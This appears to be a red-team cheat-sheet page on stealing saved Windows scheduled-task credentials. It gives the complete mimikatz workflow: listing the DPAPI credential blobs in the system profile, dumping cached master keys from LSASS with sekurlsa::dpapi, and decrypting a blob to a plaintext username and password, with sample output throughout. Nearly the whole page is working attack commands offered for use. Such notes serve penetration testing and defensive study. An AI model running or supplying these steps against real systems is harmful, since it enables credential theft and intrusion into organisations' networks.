Scheduled Task Credentials

(need local admin)

saved under: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\

Enumerate blobs

ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

528b fil 08/16/2022 14:55:28 F3190EBE0498B77B4A85ECBABCA19B6E

Get GUID of master key

mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E

guidMasterKey : {aaa23e6b-bba8-441d-923c-ec242d6690c3}

Dump cached keys

mimikatz !sekurlsa::dpapi

GUID      :	{aaa23e6b-bba8-441d-923c-ec242d6690c3}
Time      :	1/20/2023 3:17:02 PM
MasterKey :	10530dda04093232087d35345bfbb4b75db7382ed6db73806f86238f6c3527d830f67210199579f86b0c0f039cd9a55b16b4ac0a3f411edfacc593a541f8d0d9
sha1(key) :	cfbc842e78ee6713fa5dcb3c9c2d6c6d7c09f06c

Decrypt

mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\F3190EBE0498B77B4A85ECBABCA19B6E /masterkey:10530dda04093232087d35345bfbb4b75db7382ed6db73806f86238f6c3527d830f67210199579f86b0c0f039cd9a55b16b4ac0a3f411edfacc593a541f8d0d9

UserName       : DEV\jking
CredentialBlob : Qwerty123

Last updated 1 year ago